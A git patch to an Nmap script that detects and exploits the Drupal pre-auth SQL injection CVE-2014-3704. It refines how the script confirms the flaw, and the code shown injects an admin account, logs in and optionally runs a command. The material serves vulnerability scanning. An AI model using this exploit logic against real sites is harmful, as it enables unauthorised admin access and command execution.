From 30f0fab5bc468efad15de189f55d950c50a80f8e Mon Sep 17 00:00:00 2001 From: rewanth Date: Sat, 8 Jul 2017 03:11:45 +0000 Subject: [PATCH] Improves detection of cve-2014-3704. Fixes #902. Closes #905. --- scripts/http-vuln-cve2014-3704.nse | 73 ++++++++++++++++++------------ 1 file changed, 44 insertions(+), 29 deletions(-) diff --git a/scripts/http-vuln-cve2014-3704.nse b/scripts/http-vuln-cve2014-3704.nse index 12ae468e9..3f2ecff8d 100644 --- a/scripts/http-vuln-cve2014-3704.nse +++ b/scripts/http-vuln-cve2014-3704.nse @@ -216,9 +216,11 @@ local function do_sql_query(host, port, uri, user) } } local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r) - --TODO: Check return status - return user, passwd + if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then + return user, passwd + end + end local function set_php_filter(host, port, uri, session, disable) @@ -342,9 +344,37 @@ action = function(host, port) cleanup = "false" end + local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) + local vuln = { + title = 'Drupal - pre Auth SQL Injection Vulnerability', + state = vulns.STATE.NOT_VULN, + description = [[ + The expandArguments function in the database abstraction API in + Drupal core 7.x before 7.32 does not properly construct prepared + statements, which allows remote attackers to conduct SQL injection + attacks via an array containing crafted keys. + ]], + IDS = {CVE = 'CVE-2014-3704'}, + references = { + 'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html', + 'https://www.drupal.org/SA-CORE-2014-005', + 'http://www.securityfocus.com/bid/70595', + }, + dates = { + disclosure = {year = '2014', month = '10', day = '15'}, + }, + } + local user, passwd = do_sql_query(host, port, uri, nil) + if user == nil or passwd == nil then + return vulnReport:make_output(vuln) + end + stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd)) + + vuln.state = vulns.STATE.EXPLOIT + local data = { ['name'] = user, ['pass'] = passwd, @@ -355,28 +385,8 @@ action = function(host, port) local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data) if res.status == 302 and res.cookies[1].name ~= nil then - local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) - local vuln = { - title = 'Drupal - pre Auth SQL Injection Vulnerability', - state = vulns.STATE.NOT_VULN, - description = [[ -The expandArguments function in the database abstraction API in -Drupal core 7.x before 7.32 does not properly construct prepared -statements, which allows remote attackers to conduct SQL injection -attacks via an array containing crafted keys. - ]], - IDS = {CVE = 'CVE-2014-3704'}, - references = { - 'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html', - 'https://www.drupal.org/SA-CORE-2014-005', - 'http://www.securityfocus.com/bid/70595', - }, - dates = { - disclosure = {year = '2014', month = '10', day = '15'}, - }, - } + stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd)) - vuln.state = vulns.STATE.EXPLOIT if cmd ~= nil then local session = {} @@ -406,11 +416,16 @@ attacks via an array containing crafted keys. end end - -- cleanup: remove admin user - if cleanup == nil then - do_sql_query(host, port, uri, user) - end - - return vulnReport:make_output(vuln) + else + vuln.state = vulns.STATE.LIKELY_VULN + vuln.check_results = "Account created but unable to log in." end + + -- cleanup: remove admin user + if cleanup == nil then + do_sql_query(host, port, uri, user) + end + + return vulnReport:make_output(vuln) + end